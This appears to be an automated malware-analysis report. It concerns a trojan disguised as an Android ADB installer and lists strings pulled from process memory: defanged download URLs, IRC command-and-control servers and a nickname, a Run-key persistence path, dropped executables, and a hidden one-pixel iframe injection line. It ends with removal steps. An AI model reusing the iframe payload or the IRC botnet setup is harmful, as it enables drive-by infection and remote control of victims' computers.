|.LCe

..bWL

'}Dp%X

j[ftpV~x

-ùh

<9.CI)

T%C\l 

quDP`5!

tcP2sd

D}.BM

S;.QvS`

%U{[7

%ct.Y

E%s%V

-y%S;O

.USp!s

.mxz*

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

.idata

.reloc

KERNEL32.dll

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoyirc.zief.pl

proxim.ircgalaxy.pl

NICK gvhmdwhu

SFC.DLL

SFC_OS.DLL

SHLWAPI.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 ZieF.pl

#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>

X%cX%c

SfxString%d

SfxFolderd

PasswordTitle

PasswordText

%X - X - X - X - X

7ZSfxx.cmd

setup.exe

7ZipSfx.x

SfxVarCmdLine1

SfxVarCmdLine2

SfxVarCmdLine0

@ (%d%s)

1.4.3

adb-installer-1.4.3.exe

%original file name%.exe_1504_rwx_00401000_0006B000:

PSSSSSSh

<x%u<

ttNt_Nt.Nt

:Language:%u

Enter password:

0xx

"%s".

Could not overwrite file "%s".

Could not create file "%s".

0xX.

7-Zip: Internal error, code 0xX.

7-Zip: Internal error, code %u.

The archive is corrupted, or invalid password was entered.

7-Zip: Unsupported method.

Error during execution "%s".

"setup.exe"

Could not find "setup.exe".

Could not find command for "%s".

Could not delete file or folder "%s".

Could not create folder "%s".

Error in line %d of configuration data:

Could not open archive file "%s".

1.6.0 develop [x86]

2712 (30

1.6.0 develop [x86] build 2712 (December 30, 2012)

Supported methods and filters, build options:

Sorry, this program requires Microsoft Windows 2000 or later.

CreateIoCompletionPort

_acmdln

ShellExecuteW

ShellExecuteExW

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

.text

`.rdata

@.data

.rsrc

X%cX%c

SfxString%d

SfxFolderd

PasswordTitle

PasswordText

%X - X - X - X - X

7ZSfxx.cmd

setup.exe

7ZipSfx.x

SfxVarCmdLine1

SfxVarCmdLine2

SfxVarCmdLine0

@ (%d%s)

%original file name%.exe_484:

!Require Windows

`.rsrc

PSSSSSSh

<x%u<

ttNt_Nt.Nt

:Language:%u

Enter password:

0xx

"%s".

Could not overwrite file "%s".

Could not create file "%s".

0xX.

7-Zip: Internal error, code 0xX.

7-Zip: Internal error, code %u.

The archive is corrupted, or invalid password was entered.

7-Zip: Unsupported method.

Error during execution "%s".

"setup.exe"

Could not find "setup.exe".

Could not find command for "%s".

Could not delete file or folder "%s".

Could not create folder "%s".

Error in line %d of configuration data:

Could not open archive file "%s".

1.6.0 develop [x86]

2712 (30

1.6.0 develop [x86] build 2712 (December 30, 2012)

Supported methods and filters, build options:

Sorry, this program requires Microsoft Windows 2000 or later.

CreateIoCompletionPort

_acmdln

ShellExecuteW

ShellExecuteExW

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

.text

`.rdata

@.data

.rsrc

.NNNNNNNNNNNNNNNN

.NNNNNNNNNNNNNNN

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>

<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

MSVCRT.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

RunProgram="waitall:install.bat"

'K.Jj

M.oU)

.pefl

.Bo%R

.CwbR

p;g%C

h.fE$=]

rH.rW

.aw$T

-t.jq

b %CtK

oM.zS

c 9%D*J=

.zw-9K)

{].zmN0

87.Fb

K-tR}

%Ure.

(..HH

S%8Si

%fJrw

mw8.KZ2

/C0%U@

.GnH0WoK*VXvrQ

.Hl>md

.zhPi

\%uFF

Ftp0r?(

HK.lY

!.HR<

.DTf(

Ihpw.NP

'>7$%d

,e.MFM3

d.Dw i

y7.SE-

|0.NGZ

ca%sW

9H.wl

UG4%f

z.Ssu'

s-n%u

8v.BC4E

2.SUO

-5TQs}

zN.Zz

E[%c_

W9-xK.YT

TM4%D

(E%F#

P.ol\ko

=:g*(

HA;%cw

^.wOW

Q8A~X .Dir

_&.lb

.nFnA

O%3Un

.aQnX

pPSkJþ

2zycMd

!;-c}-M

v.oJ8

y.Wr,

P.NWf

A%svd^

[]v%x

c[.XN

>%uZO

.Fy%H

{k%C(h.

`.wrM

'!.Ap

/ .xy:1>u

nn`Ú?

=.cxFkm

NL%FI

G%U} R

.dSOq

hsN-F%U{

X.HIU

$.Ut\

Ok%d $*

.py/(=

|q%Se

l.jDn

nuDP!

~<$.bG

H.iV*i0'?

%XSZu*W4

RrI.fW

0%ud0

Zy%UF

y.rug

.kK%l

ez8%3u=g

jM5`.xl

.kKW8%b

\.tPI

$|%SU

d4%f>

SBEW.cY

b`FLF.Ec_

.cNI3

.AI%cl

.LK9^

l=.RK

T6 .IQ

:%c.T'

f%up,

tQOw.cg

%un?2

b.kKv

F:\#F

z2.uvIE

SE.GK8

CS.JW

& .PQk

:.vNu

#y.nKO

<.MVI;c`

#w<#%u

\.eAd

]7.Uq2b

D1%FG

.mT j

%U^4p

..iR1

nQX-O4}&

I.dIJ

BT`%Cg

9Îz

.tH55

_Dj.vY Q

(.XCw

e%ui} t

*<Uurl

<.ZB|

.HDn{9

%D;aF,

jN.prVq

3;J_Wx%ut

(%x. 

n;X%dWp

D%F.B

%d%f(

W]EXey

z!%uf

<<z.Bc^

.CVB%

l _%S@

dSshx

H.GL0

)(pöH

E:\QQ

@-.Pn

%FN0$

ye.vN

.CBE)K

ZV6%Dk

pF.yu

%fR)$

%x6YI

kEyp

&TM%s

Tg.GD

R#kEY

cmdv

Q.XDu

hp.zk/

/yGk.Wn

-btB}

>%VC%fsK

.ah~e=`}O

C&.VU

a.Ja`

<9'%uM

vsY.un

r?As.Yx

9.UbU

pl%U?

J.lAW

.VK_V

.MpBkX

9.Owdy

5b=y%u

cO.sggi

#NUDpj

.eg\~,

$%c&F;E

%h%ug

:!-}[t.EU=

.mbgy~

.Dv/y6

.LoEFu

%cZvb

=.aG"

%F$Gz

}x%.Gd

R.VS> "

ko^L%xW

Û;h

a2.tk

tA.PE-

n (.mzW$

5O.drp

s6b%Sc

f-O}2e>

\W\<.Tq

\m%.DN;G

eq(%F

%D!`K

%xX,,

?}d.gwu

PH.DY

Q%D&x

%C UvT

IÚ>

.pCkxk

%X!yL

"5>\%fi

1K/L%Sc

@j.cT^o

3.MjOB

}Mg%4%D

.QJ31

y!ga.vJZ

.rX_E

O%u:>1D

W.qO;

*.*[$

%XyIR1

'q.Ha@

]E.NE

%Uz=%

>E!:.lL-

YW.QM

.Bxx^G>

]B.aZ

x.Nq 

[tj%Xa

Y(.WJ

(.rBE

U%x]|X|XZ

%C#"KN

.DzNhf6

&.BzZ

m.lP/

Z/*.dD4p

i.Chp

vWjp%SA

 7.RK5

r%s?z

Ssh6d

^.mcV

P2.kGy

JY.HnN

ue.Se

.Is~W

yË|oh

y{.Ih

e.Nde

.jq/r

.uVwv

1.oFb

I!\6w2.BW

hf.NA

*".gf$

.lZB=

..rP~

'15%F>

W%.KP

;.Ryn/

h.bBCZ9 

k%%D)w

.XhZzS(

8.ZQ'

.frQmq

=.Eka%

 .VsF

9fs%F

.xGuY

.hfVZam

1o% ]%X

G.lM5z

Q$%FG

|%f=p

e[*%D

U,4>%d

$c..Lq

-f$hO%S

E[>{Z%F

%X9e\

:.jG.

1Ul%x

/f.cHy

g%u[Q&

9;.aU

;m'%F

L&

NG5%x;

Wa.Di

.Bw8r

.Ec f

^_.Df

i%CHJ

9.fft

2z.lU=

~M%xe

D.aF8s

.mZmW~

b4OU%D

$-xX}

{[;%F

kic%X

zu.cb

@G.lh

 gk%s

7.GAk

K=.RD

n2^o

xN[.vu

{n5,%d

S.azC4

bl.jVI

fZ.FM

.knt(

.uzn|08

.qC2 

C%dlh

gc%uz-

Ix&Z%uHD

.CWr^w

3.bpd

L.ak^

.k%Fg

K$.bw

.Sld&J

n.vUg

a.mS_

)[2.TxP

.%S'p$F

V73.Sk

-bNU}

u %c%M

..Rz%

gzl%xO

i`.QC

F/.bb

%U>v%

k%uGV

%u!w>i

|Uw^.fT

!%S4s

MUj.AF

{$Ý

pAr%d-

.KmVX{

#(.lV

{.Nc3

KO.We

:-QEX.BU

l5:

Ôb~

.PEJl

olB<NNll6.NMl

[email protected]

|k-Q}

d%d!m

F%uo<r

#.ibEd

3%Xv0s

[4 ?.YW

FtPa

<m3

s.sd~

.rPV6k$

.GLxQg

.Sfb>

%URC=

d%.KS-

,%U c

0p.Aq

l>.Rl

1ki.Mg

.NB%*

;S%x%T

F\.ue

.aO^.s>

.Xf s|;

.VdP=

S.zy;

e}%s#;

m.RT 

ðIm

..RTH

.pKpaX

U-.sr

T2%UN

&a.Os

.jgZok

{n%fPym

/Cj~.YD

!E.ky

.vQ[M

Hua~%S r

~ .cw

.vIXff

!z6'.LD

_.xQ'

V.rX{

)xPp%D

1.hIe

N..JF"b^wN#

.OL<GD'pO#Bjw1

ûp U

cq.OT

.LjVZ

.jN_Q

LYs8.pr

<#.gajY

.Tkwt7z

PfTp0

8E.CI

.hL\39

5Y7%F

C%8UF

gV%xMLc

i^.AAE

Vc.en

_V2.oPC&

^]-Y}

r.fo7=}m

.ldEJ

S{Eu%D

n.yoM

%D!Dl

k%X&a

$%X0B

g3}

%F&#\

%x1'"

zFTP

US.pGc

.vJMI

T2.el

$%.zf

5\5?5.5:50

uvŒB

%\V<.Tf

.act_

%C;R@

P&4K%S

0S.cy?)G

#.$;';)@

.Xf]U

tQ>%x

0u.oAP

.wz{h_Vc

.Mb[|

2Yg/D%S

-1pd}

#HF%xX.

"#.md

%UZ5=

O%d,w

@@@@.As

k.aIh

~S3%c

w.apsQ_

,p%F/zE

%U/&!ru

 P.MF

_7%cg?

\*%UG

$Y%x$

w.II"!,

.Qtd@

=A1%sgu

.zNKZ

(%XZG$

%x<s%

\.OyX

.xGDB{

[.fod

u-o}k

!| Ev@l%x

.AVW,

\.RbC

-n.mb

op}{%c

7&.gr_

e/x.uu?

G%u9/e

\@W.cC

"Q.Qq

/.Hk*

Di.kLJ

N.LK*

.MN:un

.JS_J

-v.AB@

LK.ay

2=.nU

}õ;#

.wwwwwwww`w

;:f%c

C!.iT

MO..ZH<

.EA0p

vg%uFGd

&I.UR

;.ce-

AHm%D

Mg%u>

M%0s<;

.xFyZ

D|%x$K

Ec.yj

S.Lk!u"~

[R.aC

AZ#5.ZN

-q}:"

Ln%Sw

iW%dM

:.qhlVfi

| %SZQ0

ac%U T

7S.tJM

6K.tm

.pLjxO

8]R.vd

"j.hu

}1kÝ

X.ZP_G

6 \r<`(-.kY?

%x~{d

&kj%sO)

.WS1s

.Dwi^

^.jY.zr

s.CELM<W

nE.GD

jyy.Er7{

#].nv

z .eJ

.DBd1[

9.Fl#}

V#.mp

%C@K'

.kJ*A

{1.cu

.ByYk

UA.jZ

.cr`5]

1^Tzo

xq.Iuj

299.Ai

T)%u=Q

 E.jKk

>O~

.jvoB

8.zO&T

.xbF!

i %s|

O?Ce.Ih

s3%d(

0.hv4

þ(#

@7%x8

1%f$uqr

WQm

bX%U=]

mj.nm

]9.jDmI

z%Cga(

r|5.VZ

lO.pT

J[m%CR

.wgaR

%.bB^

\X.Vo

&U(.fR

a.xxPZ

.RejS

.hMdzC

%9UGl*

-{.rK

-Op}o

.eOG8Yt

wEbM

`0818%8!*

QHX5g.qe

q&A.RSU

I%.Ar\

ZB.ur

\mc%x

j,Ò

b_%uF

A>%F ;

.KuAC

R"~.QA

%X-Wd

-v4}I2

.iYf$

gTexE

/-1v}

ls.yM

]DD.SU

U&%SG

,Y^%%UN

X*%sf

%Œ|

5N.zb

(udpb

d.TL^

lftp

o>M%%U7

.TOv`g

1b.mL

525<1mSg

:%SqN

%DOJw

!b*C.kR*

.By9h_

.azzm

b%ukY`

xB-i}

eul-

?hD0%c

".bggo

%S/6gbM

p"$.vB

1Å4

f.DaifL*

t~=v%S."

1.zQXa

$c%u7

G?J

ue<œ

%D-2yx

6q)%F

>>@.Eal

".yUH

6,$=%X

::%d_

j%dp\

1n.Vz

Ye.lG

O8O

M^v%X

!.NE&

/T)J%c

Tu, .ua

i.lNG

{,.yC

/ .An

w.OP0@

{.FAz

Ko%uR

%So&yk

S.OHNR

C.HQ6Dk 

.pJ2S:

dzœ

`%7XE

"H%Xz:J/|C

%S$RK

7N$%c

W%C]ei

d-wQ}

O_9%Fq

IL.rK

%f"nf

H|D%c

K%7sW

Y.yi8

Z.zZ6;X

gV.fp

~-M}<

urI.;%F

=.KpJ@

|.PXm

=%XFJ{

9g6.yu5

8>%xV

.DH.2

s`tS-C}

R.rxtqE="n

F.Cky"

.cXEd

Bh'.Ck1

R.ee:dNx

I5[%S

U5g--Z}

~Y%SY

6.oHoTn

(gSqL

@%C%E%

CMd0Z

K-.wS$r

m$].wp.

(C.SG

A!N'%u

%syePt

%u_JA

%3XJ?

gV&.tp(

f-.tua

}o.Fd

%xm_a/

E-Tl}

EZG%X

}.ow.

m=.Up]

.gB5Dn

l.Pe1

%dh:IN)-

V.pzvq

:O.ra

u.Wz/

.Nc[S

Ze.vf

..pon

=fP.KBr

P%xy-_

R%FP(Q

.aGWYb

8`%S.

.NBYb

U.qcD

X$%c)

^msgj7

.beVOd

.cwydm

%XB`.s

%uf9r

.lfjR

.HKl4G;

m%dy5

7Þ1

%Dw"l

$WL`D

B.OYXh1^

T.Os;b

.bGvW

z1#%sO

|.LCe

..bWL

'}Dp%X

j[ftpV~x

-ùh

<9.CI)

T%C\l 

quDP`5!

tcP2sd

D}.BM

S;.QvS`

%U{[7

%ct.Y

E%s%V

-y%S;O

.USp!s

.mxz*

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

.idata

.reloc

KERNEL32.dll

A.HK30

X%cX%c

SfxString%d

SfxFolderd

PasswordTitle

PasswordText

%X - X - X - X - X

7ZSfxx.cmd

setup.exe

7ZipSfx.x

SfxVarCmdLine1

SfxVarCmdLine2

SfxVarCmdLine0

@ (%d%s)

1.4.3

adb-installer-1.4.3.exe

%original file name%.exe_1504_rwx_004B8000_00001000:

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>

<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

MSVCRT.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

1.4.3

adb-installer-1.4.3.exe

%original file name%.exe_1504_rwx_00D8C000_00006000:

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

.idata

.reloc

KERNEL32.dll

ADVAPI32.DLL

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoyirc.zief.pl

proxim.ircgalaxy.pl

NICK gvhmdwhu

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 ZieF.pl

#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>

KERNEL32.DLL

MPR.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%original file name%.exe_1504_rwx_00D93000_00004000:

.idata

.reloc

KERNEL32.dll

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

iexplore.exe_1252:

%?9-*09,*19}*09

.text

.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

ADVAPI32.dll

MsgWaitForMultipleObjects

IExplorer.EXE

IIIIIB(II<.Fg

7?_____ZZSSH%

)z.UUUUUUUU

,....Qym

````2```

{.QLQIIIKGKGKGKGKGKG

;33;33;0

8888880

8887080

.ucB^

%CQ@G

W:\M!q

browseui.dll

shdocvw.dll

6.00.2900.5512 (xpsp.080413-2105)

Windows

Operating System

6.00.2900.5512

%original file name%.exe_484_rwx_00401000_0006B000:

PSSSSSSh

<x%u<

ttNt_Nt.Nt

:Language:%u

Enter password:

0xx

"%s".

Could not overwrite file "%s".

Could not create file "%s".

0xX.

7-Zip: Internal error, code 0xX.

7-Zip: Internal error, code %u.

The archive is corrupted, or invalid password was entered.

7-Zip: Unsupported method.

Error during execution "%s".

"setup.exe"

Could not find "setup.exe".

Could not find command for "%s".

Could not delete file or folder "%s".

Could not create folder "%s".

Error in line %d of configuration data:

Could not open archive file "%s".

1.6.0 develop [x86]

2712 (30

1.6.0 develop [x86] build 2712 (December 30, 2012)

Supported methods and filters, build options:

Sorry, this program requires Microsoft Windows 2000 or later.

CreateIoCompletionPort

_acmdln

ShellExecuteW

ShellExecuteExW

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

.text

`.rdata

@.data

.rsrc

X%cX%c

SfxString%d

SfxFolderd

PasswordTitle

PasswordText

%X - X - X - X - X

7ZSfxx.cmd

setup.exe

7ZipSfx.x

SfxVarCmdLine1

SfxVarCmdLine2

SfxVarCmdLine0

@ (%d%s)

%original file name%.exe_484_rwx_004B8000_00001000:

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>

<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

GDI32.dll

MSVCRT.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

1.4.3

adb-installer-1.4.3.exe

iexplore.exe_1252_rwx_00401000_00002000:

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

MsgWaitForMultipleObjects

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

IExplorer.EXE

browseui.dll

shdocvw.dll

%original file name%.exe_484_rwx_00D8C000_00001000:

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

.idata

.reloc

KERNEL32.dll

%original file name%.exe_484_rwx_00D91000_00001000:

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

%original file name%.exe_484_rwx_00D93000_00004000:

.idata

.reloc

KERNEL32.dll

USER32.DLL

ADVAPI32.DLL

MPR.DLL

WSOCK32.DLL

SHELL32.DLL

hXXp://vguarder.91i.net/user.htm

hXXp://vguarder.bravehost.com/user.htm

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinExec

RegNotifyChangeKeyValue

RegOpenKeyA

ShellExecuteA

\setupx.exe

\updatex.exe

\Serverx.exe

=.exet

=.scrt

iexplore.exe_1252_rwx_00418000_00006000:

.ucB^

%CQ@G

W:\M!q

6.00.2900.5512 (xpsp.080413-2105)

IEXPLORE.EXE

Windows

Operating System

6.00.2900.5512

Explorer.EXE_1140_rwx_00FF0000_00001000:

%System%\Serverx.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %Program Files%\Internet Explorer\IEXPLORE.EXE (332 bytes)
   %System%\Serverx.exe (1504347 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\winusbcoinstaller2.dll (10100 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinApi.dll (1862 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\adb.exe (9241 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WdfCoInstaller01009.dll (12517 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\winusbcoinstaller2.dll (8723 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusb86.cat (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x86.exe (7803 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\NOTICE.txt (236 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WdfCoInstaller01009.dll (12376 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x64.exe (9828 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WUDFUpdate_01009.dll (18515 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\android_winusb.inf (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinUsbApi.dll (392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusba64.cat (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\NOTICE.txt (236 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\install.bat (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\xp\SETX.exe (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\fastboot.exe (5044 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WUDFUpdate_01009.dll (15584 bytes)

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.